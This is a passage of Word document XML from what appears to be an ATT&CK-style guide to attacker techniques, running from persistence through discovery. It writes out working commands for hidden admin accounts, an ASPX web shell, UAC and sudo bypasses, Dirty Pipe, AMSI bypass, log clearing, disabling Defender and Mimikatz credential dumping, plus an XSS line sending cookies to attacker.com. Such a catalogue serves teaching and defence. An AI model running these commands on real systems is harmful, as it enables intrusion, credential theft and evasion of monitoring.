          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A5D72B5" wp14:editId="35DFB320">
            <wp:extent cx="4296375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2D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eastAsia="Times New Roman" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1884">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">net user BackupAdmin P@ssw0rd! /add  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="002D18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net localgroup Administrators BackupAdmin /add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Cloud IAM Abuse (AWS):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A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Create an IAM user with excessive permissions:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005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aws iam create-user --user-name "audit-admin"  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A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aws iam attach-user-policy --user-name audit-admin --policy-arn arn:aws:iam::aws:policy/AdministratorAccess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3: T1505 – Server Software Component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Modify legitimate services (e.g., web shells).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Procedure 1 – Web Shell Deployment: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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51BD4010" wp14:editId="1ADD3613">
            <wp:extent cx="5287113" cy="66684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Upload </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1884">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
        </w:rPr>
        <w:t>shell.aspx</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1884">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1884">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
        </w:rPr>
        <w:t>/var/www/html</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1884">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A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&lt;%@ Page Language="C#" %&gt;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A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&lt;% System.Diagnostics.Process.Start("cmd.exe", "/c whoami"); %&gt;  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Procedure 2 – DLL Hijacking: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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5286ECB2" wp14:editId="1F23F464">
            <wp:extent cx="5381624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397"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5382376" cy="100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Replace </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1884">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
        </w:rPr>
        <w:t>legit.dll</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1884">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a trusted application path with a malicious DLL.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Summary of Flow for Persistence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837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T1547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Add malware to startup via registry.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T1136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Create hidden admin account.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T1505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Deploy web shell on IIS server.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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Adversary Outcome:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1884">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Survives reboots and maintains access.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="002D1884">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1884">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1072" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pic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5. Tactic: Privilege Escalation (TA0004)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Goal:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1884">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Gain higher-level permissions (e.g., SYSTEM, root).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1: T1548 – Abuse Elevation Control Mechanism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Exploit UAC/sudo bypasses.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UAC Bypass (FodHelper):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27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E2005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reg add "HKCU\Software\Classes\ms-settings\shell\open\command" /d "C:\malware.exe" /f  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005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fodhelper.exe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Sudo Hijacking (Linux):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A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If </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1884">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1884">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> allows insecure PATH:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E200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echo 'echo "root ALL=(ALL) NOPASSWD: ALL" &gt;&gt; /etc/sudoers' &gt; /tmp/update  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E200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chmod +x /tmp/update  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E200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export PATH=/tmp:$PATH  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E200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sudo update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2: T1068 – Exploitation for Privilege Escalation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Leverage kernel/driver vulnerabilities.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Windows Kernel Exploit (CVE-2021-34527):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Download and execute </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1884">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
        </w:rPr>
        <w:t>PrintNightmare.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1884">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> to gain SYSTEM.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Dirty Pipe (Linux CVE-2022-0847):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A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Overwrite </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1884">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
        </w:rPr>
        <w:t>/etc/passwd</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1884">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> to add a root user:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005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./dirtypipe /etc/passwd 1 "root2::0:0::/root:/bin/bash"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3: T1055 – Process Injection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Inject code into high-privilege processes.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DLL Injection:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31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Use </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1884">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Process Hacker</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1884">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> to inject </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1884">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
        </w:rPr>
        <w:t>malware.dll</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1884">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> into </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1884">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
        </w:rPr>
        <w:t>lsass.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1884">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>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Reflective DLL (Mimikatz):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32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Load Mimikatz into memory:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E200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Invoke-Mimikatz -Command '"sekurlsa::logonpasswords"'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Summary of Flow for Privilege Escalation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930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T1548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Bypass UAC via registry hijack.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T1068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Exploit PrintNightmare for SYSTEM.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T1055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Dump credentials via Mimikatz.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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Adversary Outcome:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1884">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Gains admin/root privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="002D1884">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1884">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1073" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pic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6. Tactic: Defense Evasion (TA0005)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Goal:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1884">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Avoid detection by security tools.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1: T1027 – Obfuscated Files or Information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Hide malicious code.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XOR Encryption:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33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Encode payload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005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import xor  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A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xor.encrypt("malware.exe", key=0x41)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AMSI Bypass (PowerShell):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34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Disable AMSI scanning:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A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lastRenderedPageBreak/>
        <w:t xml:space="preserve">[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)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2: T1070 – Indicator Removal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Delete logs/artifacts.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Clear Event Logs:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35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E2005A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wevtutil cl Security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Timestomping:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36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Modify file timestamps:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A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(Get-Item "malware.exe").LastWriteTime = "01/01/2020 12:00:00"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3: T1112 – Modify Registry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Disable security controls.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Disable Windows Defender:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A">
      <w:pPr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E2005A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reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f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Whitelist Malware:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38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Add exclusion path:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A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Add-MpPreference -ExclusionPath "C:\Temp"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Summary of Flow for Defense Evasion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237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T1027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Encrypt payload to evade AV.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T1070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Clear event logs.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T1112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Disable Defender via registry.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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Adversary Outcome:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1884">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Operates stealthily.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="002D1884">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1884">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1074" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pic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7. Tactic: Credential Access (TA0006)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Goal:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1884">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Steal passwords, tokens, or keys.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lastRenderedPageBreak/>
        <w:t>Technique 1: T1003 – OS Credential Dumping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Extract credentials from memory.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LSASS Dump (Procdump):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A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E2005A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procdump.exe -ma lsass.exe lsass.dmp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Mimikatz:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A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Execute:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A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mimikatz.exe "sekurlsa::logonpasswords"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2: T1555 – Credentials from Password Stores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Harvest saved browser/logins.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Chrome Password Extraction:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A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Copy </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1884">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Login Data</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1884">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> from </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1884">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
        </w:rPr>
        <w:t>%LocalAppData%\Google\Chrome\User Data\Default</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1884">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A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Decrypt with </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1884">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ChromeDecryptor</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1884">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>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AWS CLI Cache:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A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Steal </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1884">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
        </w:rPr>
        <w:t>~/.aws/credentials</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1884">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>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3: T1539 – Steal Web Session Cookie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Hijack active sessions.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Procedure 1 – Cookie Theft (XSS):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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58138427" wp14:editId="4554D204">
            <wp:extent cx="5372850" cy="6858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Inject:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A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document.location='http://attacker.com/steal?cookie='+document.cookie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Token Impersonation (Azure):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44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Use </w:t>
      </w:r>
      <w:r w:rsidRPr="002D1884">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
        </w:rPr>
        <w:t>MicroBurst</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1884">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> to extract OAuth tokens.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lastRenderedPageBreak/>
        <w:t>Summary of Flow for Credential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370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T1003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Dump LSASS with Mimikatz.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T1555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Extract Chrome passwords.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T1539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Steal session cookies via XSS.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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Adversary Outcome:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1884">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Gains access to sensitive credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="002D1884">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1884">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1075" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pic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8. Tactic: Discovery (TA0007)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Goal:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1884">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Explore the environment for lateral movement.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1: T1018 – Remote System Discovery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Find other machines in the network.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Net View:</w:t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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68FE0E2C" wp14:editId="7FC87AE5">
            <wp:extent cx="1667108" cy="39058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Default="002D1884" w:rsidP="002D1884">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/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Procedure 2 – Ping Sweep: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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5CAC8A5D" wp14:editId="4859C844">
            <wp:extent cx="5430008" cy="35247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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45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Scan subnet:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A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for /L %i in (1,1,254) do @ping -n 1 192.168.1.%i | find "Reply"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2: T1083 – File and Directory Discovery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Locate sensitive files.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1 – Search for Databases:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46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E2005A">
      <w:pPr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Get-ChildItem -Path C:\ -Include *.db,*.sql -Recurse -ErrorAction SilentlyContinue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Find SSH Keys (Linux):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47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Search:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A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find / -name "id_rsa" 2&gt;/dev/null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Technique 3: T1069 – Permission Groups Discovery</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1884">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="002D1884">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1884">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Identify admin groups.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lastRenderedPageBreak/>
        <w:t>Procedure 1 – Local Admins:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48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Run:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A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net localgroup Administrators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Procedure 2 – AWS IAM Enumeration:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:num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</w:rPr>
        <w:t>List IAM policies:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="00E2005A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Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1884">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">aws iam list-policies  </w:t>
      </w:r>
    </w:p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Summary of Flow for Discovery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2970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jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1884">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/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T1018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List all domain machines.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T1083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Search for SQL databases.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T1069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 w:rsidP="002D1884">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1884">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>Enumerate IAM roles.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="002D1884">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1884">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Adversary Outcome:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1884">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Maps the network for lateral movement.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRPr="002D1884" w:rsidRDefault="002D1884" w:rsidP="002D1884">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D1884">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1076" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pic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9. Tactic: Lateral Movement (TA0008)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Goal:</w:t>
      </w:r>
      <w:r w:rsidRPr="002D1884">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Move across systems within the network.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1: T1021 – Remote Services (RDP, SMB, SSH)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Use legitimate protocols to pivot.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D1884" w:rsidRDefault="002D1884" w:rsidP="002D1884">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/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Pass-the-Hash (RDP):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Fonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="028369BD" wp14:editId="50459F37">
            <wp:extent cx="5943600" cy="426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pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50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Dump hashes with Mimikatz:</w:t>
      </w:r>
    </w:p>
